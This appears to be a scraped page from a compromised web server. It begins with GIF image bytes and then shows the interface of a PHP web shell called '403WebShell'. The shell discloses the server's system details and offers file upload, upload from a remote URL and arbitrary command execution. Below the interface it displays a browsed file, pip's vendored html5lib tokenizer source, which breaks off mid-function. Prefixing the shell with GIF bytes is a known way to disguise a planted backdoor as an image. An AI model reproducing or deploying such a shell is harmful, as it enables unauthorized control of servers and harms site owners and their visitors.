GIF89a=( õ' 7IAXKgNgYvYx\%wh…hŽth%ˆs%—x¨}9®Œ©€&©‰%¶†(¹–.¹5·œD¹&Çš)ÇŸ5Ç˜;Í£*È¡&Õ²)×¯7×µ<Ñ»4ï°3ø‘HÖ§KÍ¯T÷¨Yÿšqÿ»qÿÔFØ                                                                           !ù
 ' !ÿ
NETSCAPE2.0   ,    =(  þÀ“pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§gª«ªE¯°¨¬ª±²Œ¹º¹E¾­”´ÂB¶¯ §ÅÈ¸»ÑD¾¿Á•ÄÅ®° ÝH¾ÒLÀÆDÙ«D¶BÝïðÀ¾DÑÑÔTÌÍíH òGö¨A RÎÚ
|¥ÂÙ­&ºìE8œ¹kGÔAÞpx­a¶­ãR2XB®åE8I€Õ6Xî:vT)äžþÀq¦è³¥ìä»•F~%xñ Â
4#ZÔ‰O|-4Bs‘X:=
QÉ œš lºÒyXJŠGÈ¦|s
hÏíK–3l7·B|¥$'7JÞ©Üª‰‡àá”Dæn=Pƒ
¤Òëí‰`äŒ¨ljóá¯Éüv>á–Á¼5
½.69ûÏ¸d«­ºÀûnlv©‹ªîf{¬ÜãPbŸ
 l5‘Ž¯pß´
˜3aÅùäI«O’ý·‘áÞ‡˜¾Æ‚ÙÏiÇÿ‹Àƒ #öó)pâš Þ½	‘Ý{ó)vmÞü%D~6fï“ s}ÅƒƒDØW Eþ`‡þ	À…L8xá†ç˜{)x`X/> Ì}mø‚–RØ‘*|`D=‚Ø_ ^ð5 !_…'aä“OÚ—7âcð`D”Cx`ÝÂ¥ä‹éY¹—F¼¤¥Š?¡Õ™ n@`}	lÄ’ÄÉ@4>ñd
œ à‘vÒxNÃ×™@žd=ˆgsžG±æ´²æud &p8Qñ)ˆ«lXD©øÜéAžHìySun jª×k*D¤LH]
†¦§C™Jä–´Xb~ÊªwStŽ6K,°£qÁœ:9Øª:¨þªl¨@¡`‚ûÚ	».Û¬¯t‹ÆSÉ[î¢©:°=Š‹„‘Nåû”Ìî{Â¿ÂA ‡Rà›ÀÙ6úë°Ÿð0Ä_ ½;ÃÏ±îÉì^ÇÛÇ#Ëë¼ôº!±Ä˜íUîÅÇ;0L1óÁµö«p%
AÀºUÌ¬Ýµ¼á%éœ¼€‡¯Á~`ÏG¯»À×
 ­²± =4ªnpð3¾¤³¯­ü¾¦îuÙuµÙ®|%2ÊIÿür¦#0·ÔJ``8È@S@5ê¢ö×Þ^`8EÜ]ý.ëœƒÂç 7 ú È‰Þj œ½Dç zý¸iþœÑÙûÄë!ˆÞÀl§Ïw‹*DçI€nEX¯¬¼	&A¬Go¼QföõFç°¯;é¦÷îŽêJ°îúôF5¡ÌQ|îúöXªæ»TÁÏyñêï]ê² o óÎC=öõ›ÒÓPB@ D×½œä(>èCÂxŽ`±«Ÿ–JÐ€»Û á¤±p+eE0`ëŽ`AÚ/NE€Ø†À9‚@¤à	H½7”à‡%B‰`Àl*ƒó‘–‡8 2ñ%¸ —€:Ù1Á‰E¸àux%nP1ð!‘ðC)¾P81lÑÉ¸F#ˆ€{´âé°ÈB„0>±û
°b¡Š´±O‚3È–Ù()yRpbµ¨E.Z‘D8ÊH@%òŒx+%Ù˜Æcü »¸˜fõ¬b·d`Fê™8èXH"ÉÈ-±|1Ô6iI, 2““¬$+](A*jÐQTÂo‰.ÛUìŠ¬Œã„Ž`¯SN¡–¶Äåyše¯ª’­¬‚´b¦Éož œ)åyâ@Ì®3	ÎtTÌ‰°&Ø+žLÀf"Ø-|žçÔ>‡Ðv¦Ðžì\‚ Q1)Ž@Žh#aP72”ˆ™¨$‚  !ù
 " ,    =( …7IAXG]KgNgYvYxR"k\%w]'}hŽth%ˆg+ˆs%—r.—m3šx3˜x¨}9®€&©€+¨‡7§‰%¶†(¹–.¹œD¹&Ç˜;Í•&×²)×»4ïÌ6ò§KÍ                                                                                          þ@‘pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g «¬ E ±±
¨­¶°ººE
ÁÂ´”·®C¬²§Ç¶Œ»ÓDÃÃ•Æ·¯Ê±H½ºM×ÁGÚ¬D¶BËÁ½î½DÓôTÏÛßîG»ôõC×CÌ	l&âž:'òtU³6É¹#·Ø)€'Ü.6±&ëÍÈ»
K(8p0N?!æ2"ÛˆNÄ²X>R¼ÐO‚M	'¡¨2¸*Ÿþ>#nâ†
å@‚<[:¡Iïf’ ¤TÚË˜CdbÜÙ“[«ŽEú5MBo¤×@€`@„€Êt W-3 ¶Ÿ¡BíêäjIÝ…Eò9[T…$íêï¯§„…•s»ÓÈ³¹€ÅÚdc®UUÏ#±Ùïldj?´í¼²`\ŽÁðÞu|3'ÖŒ]ë6 ¶S#²‡˜FKLÈ *N
E´‘áäŠ$˜›eÄYD„ºq«.èì´ƒs \-ÔjA9²õ÷å- üúM[Âx(ís÷ì®x€|í¡Ù’p¦‚ ŽkÛTÇDpE@WÜ	²Ç]kŠ1¨ þ€·Yb ÓÁ‰l°*n0 ç™—žzBdÐžu¾7Ä‰Bl€â‰-ºx~|UåU‰
 h*Hœ|e"#"?vpÄiŠe6^ˆ„+qâŠm8  #VÇá <Fù–C™Ä^F9Ä #­ÉRAGb©d“(0$kêè‘ž¨'L¢)B]æù¨eŠ>‘å–ÄV„œ|Šè•m"Ñœn|@›U¶ÆÎž—Špb¥G¨ED”€±Úê2FÌIç?
>Éxå
Œ±
¡¤„%‘žjŸ‘ê„¯<Ìaà9Ä³Ð2˜D¦È&›†Z`‚å]wþ¼Â:ç6àB¤7eFJ|õÒ§Õ,¨äàFÇ®cS·Ê¶+B°,‘Þ˜ºNûãØ>PADÌHD¹æž«ÄÀnÌ¥}­#Ë’ë
QÀÉSÌÂÇ2ÌXÀ{æk²lQÁ2«ÊðÀ¯w|2Íh‹ÄÂG€,m¾¶ë3ÐÙ6-´ÅE¬L°ÆIÄÂ³*K½ÀÇqï`DwVÍQXœÚÔpeœ±¬Ñ	q˜§Tœ½µƒ°Œìu Â<¶aØ*At¯lmEØ
üôÛN[P1ÔÛ¦­±$ÜÆ@`ùåDpy¶yXvCAyåB`ŽD¶	0QwG#¯
æš[^Äþ	$ÀÓÝÇ¦{„L™[±úKÄgÌ;ï£S~¹ìGX.ôgoT.»åˆ°ùŸûù¡?1zö¦Ÿž:ÅgÁ|ì<O»í!‹œ{÷E ÿ{ðVðÚú×Cß{òËgo„óõú’'ßzEHÔrJÅ=˜5€Ýé²¥ºá¹î4Â÷ˆÐ´V	w ƒß$xVA.¬+üä'ÊE„E ^ž‡©£•84`K—>L¹„®£œŠ‚à0œ]PÁ^p	F<"•ç?!,ñ‡N4—…PÄ Á„ö¨Û:Tè@hÀ‹%táÿ:ø-žI<`þ‹p I….)^ 40D#p@ƒj4Â–Ø€:²‰1Øâr˜¼F2oW¼#Z†;$Q	q”
‘ ÂK¦ñNl#29 !’F@¥Bh·á€L!—XFóLH‘Kh¤.«hE&JòG¨¥<™WN!€ÑÙÚˆY„@†>Œž19J" 2,/
&.GXB%ÌRÈ9B6¹W]’î×ÔW¥’IÎ$ ñ‹ÓŒE8YÆ	¼³™ñA5“à®Q.aŸB€&Ø©³ JÁ—!	¦t)K%tœ-¦JF
bòNMxLôþ)ÐR¸Ð™‘ èÝ6‘O!THÌ„HÛ	‰   !ù
 ) ,    =( …AXKgNgYvYxR"k\%wh…hŽh%ˆg+ˆs%—r.—x3˜x¨}9®€&©€+¨Œ,©‡7§‰%¶†(¹–.¹5·&Çš)Ç˜;Í•&×£*È²)×¯7×»4ï°3øÌ6ò‘HÖ§KÍ»Hó¯T÷¨Yÿ»qÿÇhÿ                                                                     þÀ”pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g ª«

E$±²¨ª­
·
°²½$E$ÂÃ•««D· Í ¿¦Ç¶¸ÌŒ¾³CÃÅÆ EééH½MÛÂGâªD­çBêêÏ¾D²ÒaÀà€Š1r­ðÓ¤	ÔožzU!L˜C'¾yW½UGtäÇïÙllê0×àÂuGþ)AÀs[þ·xì
ÁxO%ƒûX2ó—

P£n›R/¡ÑšHše+êDm?#—‘Ç£6¡8íJ¡ŸâDiäªM¥Ö„ôj“¬¹£5oQ7°-
<‡
*´lãÓŒ2r/a!l)dÈ A™ÈE¢ôÔÍ†…ð;Ö˜c ¡%ß‚’Ùˆâ¸b½—pe~C"BíëÚHïeF2§æŠ8qb t_`urŠeü
wÅu3êæPv§h•"ß`íÃxçLÄ¹ÜÖ3á
 ~Öº“®›¸ÏMDfJÙ
°„ÛµáWõ%§œ‚à©–‚X ÓØ)@®Ñ›Eþ´wëuÅSxb8y\mÃ–zœ¥§ZbºE—ÂLªÌw!y(>¡™wú=Ç|ÅÝs¢d€CÁW)HÜcC$€L Ä7„r.á\{)@ð` @	äXÈ$PD” `šaG:§æˆOˆ72EÐamn]ù"ŒcÊxÑŒ° &dR8`g«iÙŸLR!¦P
…d’ä¡“¦ðÎTƒ¦ià|À _
¥ Qi#¦Šg›Æ ›noMµ
›V
ã£)p ç£ÎW…š=Âeªk§†j„ ´®1ß²sÉxéW«jšl|0¯B0Û, \jÛ´›6±¬¶C
ÛíWþï|ëÙ‹¸ñzÄ¸V {ì;Ýñn¼òVˆm³I¼³.Ðã¤PN¥
²µ¼„µCã+¹ÍByî£Ñ¾HÅ¸›ëêÂ
7ìYÆFTk¨SaoaY$Dµœìï¿Ã29RÈkt Çïfñ ÇÒ:ÀÐSp¹3ÇI¨â¥DZÄ ü9Ïýögñ½­uÔ*3)O‘˜Ö[_hv
,àî×EtŸé¶BH€Õ[ü±64M@ÔSÌM7dÐlî˜¶5-ÄÙUÜ´©zßŒ3Ô€3ž„ „ ¶ÛPô½5×g›
êÚ˜kN„Ý…0Îj4€Ìë°“#{þÕ3S2çKÜ'á»£lø¼Ú2K{° {Û¶?žmð¸§ ËI¼nEò='êüóºè^üæÃ_Û=°óž‚ì#Oý¿Í'¡½áo..ÏYìnüñCœO±Áa¿¢Kô½o,üÄËbö²çºíï{ËC Ú—"”Ï{ËK ÍÒw„õ±Oz dÕ¨à:$ ƒô—«v»]	A#ð «€¿šéz)Rx×¿ˆ¥‚d``èw-îyÏf×K!ð€þ­Ð|ìPÄ¾„=Ì`ý(fÂ” 'Pa
¥ÐBJa%Ðâf§„%Š¡}FàáÝ×6>ÉäŠG"éŽè=ø!oŠ°^FP¼Ø©Q„ÀCÙÁ`(Ž\ÄÝ®
©Â$<n@dÄ E#ììUÒI! ‚#lù‹`k¦ÐÇ'Rró’ZýNBÈMF
Í[¤+‹ðÉˆ-áwj¨¥þ8¾rá
,VÂh„"|½œ=×G_¦Ñ™EØ 0i*%Ì²˜Æda0mV‚k¾)›;„&6 p>ÓjK“¦Ç#
âDÂ:ûc?:R	Ó¬fÞéI-Ì“•Ã<ä=™Ï7˜3œ¨˜c2ŒW	,ˆ”8(T™P‰FÂ¡Jhç"‚  ;<html>
<!doctypehtml><html><head><title>403WebShell</title><meta content="noindex"name="robots"></head><body bgcolor="#1f1f1f"text="#ffffff"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"rel="stylesheet"><style>@import url(https://fonts.googleapis.com/css?family=Dosis);@import url(https://fonts.googleapis.com/css?family=Bungee);@import url(https://fonts.googleapis.com/css?family=Russo+One);body{font-family:Consolas,cursive;text-shadow:0 0 1px #757575}body::-webkit-scrollbar{width:12px}body::-webkit-scrollbar-track{background:#1f1f1f}body::-webkit-scrollbar-thumb{background-color:#1f1f1f;border:3px solid gray}#content tr:hover{background-color:#636263;text-shadow:0 0 10px #fff}#content .first{background-color:#5e5e5e}#content .first:hover{background-color:#25383c;text-shadow:0 0 1px #757575}table{border:1px #000 dotted;table-layout:fixed}td{word-wrap:break-word}a{color:#df5;text-decoration:none}a:hover{color:#000;text-shadow:0 0 10px #fff}input,select,textarea{border:1px #000 solid;-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px}.gas{background-color:#1f1f1f;color:#fff;cursor:pointer}select{background-color:transparent;color:#fff}select:after{cursor:pointer}.linka{background-color:transparent;color:#fff}.up{background-color:transparent;color:#fff}option{background-color:#1f1f1f}.btf{background:0 0;border:1px #fff solid;cursor:pointer}::-webkit-file-upload-button{background:0 0;color:#fff;border-color:#fff;cursor:pointer}</style><center><font face="Bungee" size="5">403Webshell</font></center>
<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Server IP : <font color=#df5>172.67.177.218</font> &nbsp;/&nbsp; Your IP : <font color=#df5>216.73.216.195</font><br>Web Server : <font color='#df5'>LiteSpeed</font><br>System : <font color='#df5'>Linux premium229.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64</font><br>User : <font color='#df5'>akhalid&nbsp;</font>( <font color='#df5'>749</font>)<br>PHP Version : <font color='#df5'>8.3.22</font><br>Disable Function : <font color='#df5'>NONE</font></font><br>MySQL : <font color=red>OFF</font> &nbsp;|&nbsp; cURL : <font color=green>ON</font> &nbsp;|&nbsp; WGET : <font color=green>ON</font> &nbsp;|&nbsp; Perl : <font color=green>ON</font> &nbsp;|&nbsp; Python : <font color=green>ON</font> &nbsp;|&nbsp; Sudo : <font color=red>OFF</font> &nbsp;|&nbsp; Pkexec : <font color=red>OFF</font><br>Directory : &nbsp;<a href="?loknya=/">/</a><a href="?loknya=/opt">opt</a>/<a href="?loknya=/opt/alt">alt</a>/<a href="?loknya=/opt/alt/python311">python311</a>/<a href="?loknya=/opt/alt/python311/lib">lib</a>/<a href="?loknya=/opt/alt/python311/lib/python3.11">python3.11</a>/<a href="?loknya=/opt/alt/python311/lib/python3.11/site-packages">site-packages</a>/<a href="?loknya=/opt/alt/python311/lib/python3.11/site-packages/pip">pip</a>/<a href="?loknya=/opt/alt/python311/lib/python3.11/site-packages/pip/_vendor">_vendor</a>/<a href="?loknya=/opt/alt/python311/lib/python3.11/site-packages/pip/_vendor/html5lib">html5lib</a>/</td></tr><tr><td><br>Upload File : <form enctype="multipart/form-data" method="post">
<input type="radio" value="1" name="dirnya" checked>current_dir [ <font color='red'>Writeable</font> ]
<input type="radio" value="2" name="dirnya" >document_root [ <font color='green'>Writeable</font> ]
<br>
<input type="hidden" name="upwkwk" value="aplod">
<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br>
<input type="text" name="darilink" class="up" placeholder="https://linuxploit.com/upload.txt">&nbsp;<input type="text" name="namalink" class="up" size="5" placeholder="kerang.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">
</form><br><form method="post" enctype="application/x-www-form-urlencoded">
Command : <input type="text" name="komend" class="up" style="cursor: pointer; border-color: #000" value="">
<input type="submit" name="komends" value=">>" class="up" style="cursor: pointer; border-color: #fff">
</form></table><br><hr><center style="font-family: Russo One">[ <a href='/228ef4/index.php'>Back</a> ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<hr></center><br><tr><td>Current File : /opt/alt/python311/lib/python3.11/site-packages/pip/_vendor/html5lib/_tokenizer.py</tr></td></table><br/><pre>from __future__ import absolute_import, division, unicode_literals

from pip._vendor.six import unichr as chr

from collections import deque, OrderedDict
from sys import version_info

from .constants import spaceCharacters
from .constants import entities
from .constants import asciiLetters, asciiUpper2Lower
from .constants import digits, hexDigits, EOF
from .constants import tokenTypes, tagTokenTypes
from .constants import replacementCharacters

from ._inputstream import HTMLInputStream

from ._trie import Trie

entitiesTrie = Trie(entities)

if version_info &gt;= (3, 7):
    attributeMap = dict
else:
    attributeMap = OrderedDict


class HTMLTokenizer(object):
    &quot;&quot;&quot; This class takes care of tokenizing HTML.

    * self.currentToken
      Holds the token that is currently being processed.

    * self.state
      Holds a reference to the method to be invoked... XXX

    * self.stream
      Points to HTMLInputStream object.
    &quot;&quot;&quot;

    def __init__(self, stream, parser=None, **kwargs):

        self.stream = HTMLInputStream(stream, **kwargs)
        self.parser = parser

        # Setup the initial tokenizer state
        self.escapeFlag = False
        self.lastFourChars = []
        self.state = self.dataState
        self.escape = False

        # The current token being created
        self.currentToken = None
        super(HTMLTokenizer, self).__init__()

    def __iter__(self):
        &quot;&quot;&quot; This is where the magic happens.

        We do our usually processing through the states and when we have a token
        to return we yield the token which pauses processing until the next token
        is requested.
        &quot;&quot;&quot;
        self.tokenQueue = deque([])
        # Start processing. When EOF is reached self.state will return False
        # instead of True and the loop will terminate.
        while self.state():
            while self.stream.errors:
                yield {&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;: self.stream.errors.pop(0)}
            while self.tokenQueue:
                yield self.tokenQueue.popleft()

    def consumeNumberEntity(self, isHex):
        &quot;&quot;&quot;This function returns either U+FFFD or the character based on the
        decimal or hexadecimal representation. It also discards &quot;;&quot; if present.
        If not present self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;]}) is invoked.
        &quot;&quot;&quot;

        allowed = digits
        radix = 10
        if isHex:
            allowed = hexDigits
            radix = 16

        charStack = []

        # Consume all the characters that are in range while making sure we
        # don&#039;t hit an EOF.
        c = self.stream.char()
        while c in allowed and c is not EOF:
            charStack.append(c)
            c = self.stream.char()

        # Convert the set of characters consumed to an int.
        charAsInt = int(&quot;&quot;.join(charStack), radix)

        # Certain characters get replaced with others
        if charAsInt in replacementCharacters:
            char = replacementCharacters[charAsInt]
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;illegal-codepoint-for-numeric-entity&quot;,
                                    &quot;datavars&quot;: {&quot;charAsInt&quot;: charAsInt}})
        elif ((0xD800 &lt;= charAsInt &lt;= 0xDFFF) or
              (charAsInt &gt; 0x10FFFF)):
            char = &quot;\uFFFD&quot;
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;illegal-codepoint-for-numeric-entity&quot;,
                                    &quot;datavars&quot;: {&quot;charAsInt&quot;: charAsInt}})
        else:
            # Should speed up this check somehow (e.g. move the set to a constant)
            if ((0x0001 &lt;= charAsInt &lt;= 0x0008) or
                (0x000E &lt;= charAsInt &lt;= 0x001F) or
                (0x007F &lt;= charAsInt &lt;= 0x009F) or
                (0xFDD0 &lt;= charAsInt &lt;= 0xFDEF) or
                charAsInt in frozenset([0x000B, 0xFFFE, 0xFFFF, 0x1FFFE,
                                        0x1FFFF, 0x2FFFE, 0x2FFFF, 0x3FFFE,
                                        0x3FFFF, 0x4FFFE, 0x4FFFF, 0x5FFFE,
                                        0x5FFFF, 0x6FFFE, 0x6FFFF, 0x7FFFE,
                                        0x7FFFF, 0x8FFFE, 0x8FFFF, 0x9FFFE,
                                        0x9FFFF, 0xAFFFE, 0xAFFFF, 0xBFFFE,
                                        0xBFFFF, 0xCFFFE, 0xCFFFF, 0xDFFFE,
                                        0xDFFFF, 0xEFFFE, 0xEFFFF, 0xFFFFE,
                                        0xFFFFF, 0x10FFFE, 0x10FFFF])):
                self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                        &quot;data&quot;:
                                        &quot;illegal-codepoint-for-numeric-entity&quot;,
                                        &quot;datavars&quot;: {&quot;charAsInt&quot;: charAsInt}})
            try:
                # Try/except needed as UCS-2 Python builds&#039; unichar only works
                # within the BMP.
                char = chr(charAsInt)
            except ValueError:
                v = charAsInt - 0x10000
                char = chr(0xD800 | (v &gt;&gt; 10)) + chr(0xDC00 | (v &amp; 0x3FF))

        # Discard the ; if present. Otherwise, put it back on the queue and
        # invoke parseError on parser.
        if c != &quot;;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;numeric-entity-without-semicolon&quot;})
            self.stream.unget(c)

        return char

    def consumeEntity(self, allowedChar=None, fromAttribute=False):
        # Initialise to the default output for when no entity is matched
        output = &quot;&amp;&quot;

        charStack = [self.stream.char()]
        if (charStack[0] in spaceCharacters or charStack[0] in (EOF, &quot;&lt;&quot;, &quot;&amp;&quot;) or
                (allowedChar is not None and allowedChar == charStack[0])):
            self.stream.unget(charStack[0])

        elif charStack[0] == &quot;#&quot;:
            # Read the next character to see if it&#039;s hex or decimal
            hex = False
            charStack.append(self.stream.char())
            if charStack[-1] in (&quot;x&quot;, &quot;X&quot;):
                hex = True
                charStack.append(self.stream.char())

            # charStack[-1] should be the first digit
            if (hex and charStack[-1] in hexDigits) \
                    or (not hex and charStack[-1] in digits):
                # At least one digit found, so consume the whole number
                self.stream.unget(charStack[-1])
                output = self.consumeNumberEntity(hex)
            else:
                # No digits found
                self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                        &quot;data&quot;: &quot;expected-numeric-entity&quot;})
                self.stream.unget(charStack.pop())
                output = &quot;&amp;&quot; + &quot;&quot;.join(charStack)

        else:
            # At this point in the process might have named entity. Entities
            # are stored in the global variable &quot;entities&quot;.
            #
            # Consume characters and compare to these to a substring of the
            # entity names in the list until the substring no longer matches.
            while (charStack[-1] is not EOF):
                if not entitiesTrie.has_keys_with_prefix(&quot;&quot;.join(charStack)):
                    break
                charStack.append(self.stream.char())

            # At this point we have a string that starts with some characters
            # that may match an entity
            # Try to find the longest entity the string will match to take care
            # of &amp;noti for instance.
            try:
                entityName = entitiesTrie.longest_prefix(&quot;&quot;.join(charStack[:-1]))
                entityLength = len(entityName)
            except KeyError:
                entityName = None

            if entityName is not None:
                if entityName[-1] != &quot;;&quot;:
                    self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                            &quot;named-entity-without-semicolon&quot;})
                if (entityName[-1] != &quot;;&quot; and fromAttribute and
                    (charStack[entityLength] in asciiLetters or
                     charStack[entityLength] in digits or
                     charStack[entityLength] == &quot;=&quot;)):
                    self.stream.unget(charStack.pop())
                    output = &quot;&amp;&quot; + &quot;&quot;.join(charStack)
                else:
                    output = entities[entityName]
                    self.stream.unget(charStack.pop())
                    output += &quot;&quot;.join(charStack[entityLength:])
            else:
                self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                        &quot;expected-named-entity&quot;})
                self.stream.unget(charStack.pop())
                output = &quot;&amp;&quot; + &quot;&quot;.join(charStack)

        if fromAttribute:
            self.currentToken[&quot;data&quot;][-1][1] += output
        else:
            if output in spaceCharacters:
                tokenType = &quot;SpaceCharacters&quot;
            else:
                tokenType = &quot;Characters&quot;
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[tokenType], &quot;data&quot;: output})

    def processEntityInAttribute(self, allowedChar):
        &quot;&quot;&quot;This method replaces the need for &quot;entityInAttributeValueState&quot;.
        &quot;&quot;&quot;
        self.consumeEntity(allowedChar=allowedChar, fromAttribute=True)

    def emitCurrentToken(self):
        &quot;&quot;&quot;This method is a generic handler for emitting the tags. It also sets
        the state to &quot;data&quot; because that&#039;s what&#039;s needed after a token has been
        emitted.
        &quot;&quot;&quot;
        token = self.currentToken
        # Add token to the queue to be yielded
        if (token[&quot;type&quot;] in tagTokenTypes):
            token[&quot;name&quot;] = token[&quot;name&quot;].translate(asciiUpper2Lower)
            if token[&quot;type&quot;] == tokenTypes[&quot;StartTag&quot;]:
                raw = token[&quot;data&quot;]
                data = attributeMap(raw)
                if len(raw) &gt; len(data):
                    # we had some duplicated attribute, fix so first wins
                    data.update(raw[::-1])
                token[&quot;data&quot;] = data

            if token[&quot;type&quot;] == tokenTypes[&quot;EndTag&quot;]:
                if token[&quot;data&quot;]:
                    self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                            &quot;data&quot;: &quot;attributes-in-end-tag&quot;})
                if token[&quot;selfClosing&quot;]:
                    self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                            &quot;data&quot;: &quot;self-closing-flag-on-end-tag&quot;})
        self.tokenQueue.append(token)
        self.state = self.dataState

    # Below are the various tokenizer states worked out.
    def dataState(self):
        data = self.stream.char()
        if data == &quot;&amp;&quot;:
            self.state = self.entityDataState
        elif data == &quot;&lt;&quot;:
            self.state = self.tagOpenState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;\u0000&quot;})
        elif data is EOF:
            # Tokenization ends.
            return False
        elif data in spaceCharacters:
            # Directly after emitting a token you switch back to the &quot;data
            # state&quot;. At that point spaceCharacters are important so they are
            # emitted separately.
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;SpaceCharacters&quot;], &quot;data&quot;:
                                    data + self.stream.charsUntil(spaceCharacters, True)})
            # No need to update lastFourChars here, since the first space will
            # have already been appended to lastFourChars and will have broken
            # any &lt;!-- or --&gt; sequences
        else:
            chars = self.stream.charsUntil((&quot;&amp;&quot;, &quot;&lt;&quot;, &quot;\u0000&quot;))
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;:
                                    data + chars})
        return True

    def entityDataState(self):
        self.consumeEntity()
        self.state = self.dataState
        return True

    def rcdataState(self):
        data = self.stream.char()
        if data == &quot;&amp;&quot;:
            self.state = self.characterReferenceInRcdata
        elif data == &quot;&lt;&quot;:
            self.state = self.rcdataLessThanSignState
        elif data == EOF:
            # Tokenization ends.
            return False
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;\uFFFD&quot;})
        elif data in spaceCharacters:
            # Directly after emitting a token you switch back to the &quot;data
            # state&quot;. At that point spaceCharacters are important so they are
            # emitted separately.
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;SpaceCharacters&quot;], &quot;data&quot;:
                                    data + self.stream.charsUntil(spaceCharacters, True)})
            # No need to update lastFourChars here, since the first space will
            # have already been appended to lastFourChars and will have broken
            # any &lt;!-- or --&gt; sequences
        else:
            chars = self.stream.charsUntil((&quot;&amp;&quot;, &quot;&lt;&quot;, &quot;\u0000&quot;))
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;:
                                    data + chars})
        return True

    def characterReferenceInRcdata(self):
        self.consumeEntity()
        self.state = self.rcdataState
        return True

    def rawtextState(self):
        data = self.stream.char()
        if data == &quot;&lt;&quot;:
            self.state = self.rawtextLessThanSignState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;\uFFFD&quot;})
        elif data == EOF:
            # Tokenization ends.
            return False
        else:
            chars = self.stream.charsUntil((&quot;&lt;&quot;, &quot;\u0000&quot;))
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;:
                                    data + chars})
        return True

    def scriptDataState(self):
        data = self.stream.char()
        if data == &quot;&lt;&quot;:
            self.state = self.scriptDataLessThanSignState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;\uFFFD&quot;})
        elif data == EOF:
            # Tokenization ends.
            return False
        else:
            chars = self.stream.charsUntil((&quot;&lt;&quot;, &quot;\u0000&quot;))
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;:
                                    data + chars})
        return True

    def plaintextState(self):
        data = self.stream.char()
        if data == EOF:
            # Tokenization ends.
            return False
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;\uFFFD&quot;})
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;:
                                    data + self.stream.charsUntil(&quot;\u0000&quot;)})
        return True

    def tagOpenState(self):
        data = self.stream.char()
        if data == &quot;!&quot;:
            self.state = self.markupDeclarationOpenState
        elif data == &quot;/&quot;:
            self.state = self.closeTagOpenState
        elif data in asciiLetters:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;StartTag&quot;],
                                 &quot;name&quot;: data, &quot;data&quot;: [],
                                 &quot;selfClosing&quot;: False,
                                 &quot;selfClosingAcknowledged&quot;: False}
